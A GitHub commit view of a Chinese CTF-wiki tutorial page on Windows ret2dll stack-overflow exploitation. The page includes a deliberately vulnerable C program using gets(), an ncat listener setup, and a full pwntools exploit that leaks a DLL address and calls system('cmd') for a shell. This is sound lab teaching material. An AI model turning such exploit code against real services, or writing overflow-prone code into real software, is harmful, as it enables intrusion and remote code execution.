-
Notifications
You must be signed in to change notification settings - Fork 1.4k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
2 changed files
with
86 additions
and
0 deletions.
There are no files selected for viewing
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
86 changes: 86 additions & 0 deletions
86
docs/zh/docs/pwn/windows/user-mode/stackoverflow/ret2dll.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,86 @@ | ||
# ret2dll利用 | ||
|
||
原理与linux下的ret2libc类似,不过需要手动提取地址,目前pwntools不能提取exe文件地址。 | ||
源代码如下 | ||
``` | ||
#include <stdio.h> | ||
#include <ctype.h> | ||
#define DEFAULT_LEN 16 | ||
int val(){ | ||
char buff[DEFAULT_LEN] = {0}; | ||
gets(buff); | ||
} | ||
int main(void) | ||
{ | ||
puts("start"); | ||
fflush(stdout); | ||
val(); | ||
fflush(stdout); | ||
puts("end"); | ||
fflush(stdout); | ||
} | ||
``` | ||
使用gcc(MinGW-W64 x86_64-ucrt-posix-seh)在windows下编译 | ||
|
||
`gcc "-Wl,--disable-reloc" -g -o ret2dll.exe ret2dll.c` | ||
|
||
|
||
## 搭建临时环境 | ||
|
||
使用ncat | ||
`ncat -l 8080 --keep-open --exec ".\ret2dll.exe"` | ||
使用win_server | ||
win_server ./ret2dll.exe 8080 | ||
|
||
exp如下 | ||
``` | ||
from pwn import * | ||
context.log_level='debug' | ||
context.arch='amd64' | ||
p=remote("192.168.0.190",8080)#这里替换为windows的ip | ||
main_addr=0x14000155B#手动输入地址 | ||
ret_addr=0x1400015D7 | ||
puts_plt=0x140002868 | ||
puts_got=0x14000829C | ||
rdi_addr=0x140002447 | ||
rcx_addr=0x140002750 | ||
#bp 0x140001554 | ||
payload = b'a' * (0x10 +8) | ||
payload += p64(rcx_addr) | ||
payload += p64(puts_got) | ||
payload += p64(puts_plt) | ||
payload += p64(main_addr) | ||
p.recvuntil("start") | ||
p.sendline(payload) | ||
puts_leak=u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b'\x00')) | ||
print("leak addr:",hex(puts_leak)) | ||
puts_dll=0x11014E470 | ||
cmd_dll=0x0110179E48 | ||
sytem_dll=0x0110117E50 | ||
dll_base=puts_leak-puts_dll | ||
# dll_base=0x7ffe71e00000 | ||
print("base addr:",hex(dll_base)) | ||
cmd_addr = dll_base +cmd_dll | ||
system_addr=dll_base+sytem_dll | ||
print("start attck") | ||
payload = b'a' * (0x10 + 8) | ||
payload += p64(ret_addr) | ||
payload += p64(rcx_addr) | ||
payload += p64(cmd_addr) | ||
payload += p64(system_addr) | ||
p.sendline(payload) | ||
p.interactive() | ||
``` | ||
|
||
效果如下 | ||
|
||
![ret2dll](./figure/ret2dll-1.png) |